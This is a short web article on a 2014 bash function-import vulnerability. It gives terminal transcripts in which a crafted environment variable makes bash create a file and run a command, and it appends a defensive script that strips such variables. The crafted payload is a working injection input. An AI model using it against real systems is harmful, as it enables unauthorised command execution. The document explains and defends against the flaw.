
A bash security vulnerability on Linux

Date: 09-12 Source: Internet

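1. By setting a specially crafted environment variable through env, the properties of a Linux command can be looked up indirectly, as shown below. In the transcript, no file named date exists before the bash invocation; afterwards an empty file named date is present in the current directory.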

[2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

ls: cannot access date: No such file or directory

[2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

bash: X: line 1: syntax error near unexpected token `='

bash: X: line 1: `'

bash: error importing function definition for `X'

[2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

-rw-rw-r--. 1 david david 0 Sep 27 13:01 date

[2014-09-27 13:01:27 david@davidcchen ~]$

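2. Running a command once via the environment variable. The date output in the transcript is printed by cat echo: bash ran date and redirected its output into a file named echo.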

[2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

zsh 4.3.10 (x86_64-redhat-linux-gnu)

[2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

Copyright (C) 2009 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later

This is free software; you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

[2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c echo date; cat echo; rm echo

bash: X: line 1: syntax error near unexpected token `='

bash: X: line 1: `'

bash: error importing function definition for `X'

Sat Sep 27 13:03:52 CST 2014

----------> the date command ran successfully

[2014-09-27 13:03:52 david@davidcchen ~]$
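
As a defensive counterpart to the two transcripts above, the following added example (not part of the original page) lists environment variables whose value starts with `() {` and runs a command with them removed. The function names `list_function_like_vars` and `run_scrubbed` and the script name `scrub.sh` are hypothetical, and `env -u` (GNU coreutils, BSD) is assumed to be available.

```shell
#!/bin/sh
# Added example (not from the original page). Function names are hypothetical.

# Print the names of environment variables whose value begins with "() {",
# the prefix that bash's function import acts on in the transcripts above.
# awk's ENVIRON array is used so multi-line values cannot confuse the scan.
list_function_like_vars() {
    awk 'BEGIN {
        for (name in ENVIRON)
            if (index(ENVIRON[name], "() {") == 1)
                print name
    }' | sort
}

# Run "$@" with every such variable removed from the child's environment.
# Assumes an env that supports -u NAME (GNU coreutils, BSD).
run_scrubbed() {
    (
        set -f      # variable names are data: no globbing
        for name in $(list_function_like_vars); do
            set -- -u "$name" "$@"
        done
        exec env "$@"
    )
}

# Wrapper usage: ./scrub.sh bash -c 'date'
if [ "$#" -gt 0 ]; then
    run_scrubbed "$@"
fi
```

Scrubbing the environment only narrows what reaches bash from an untrusted caller; the names printed by `list_function_like_vars` are also worth logging, since ordinary variables rarely start with `() {`.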
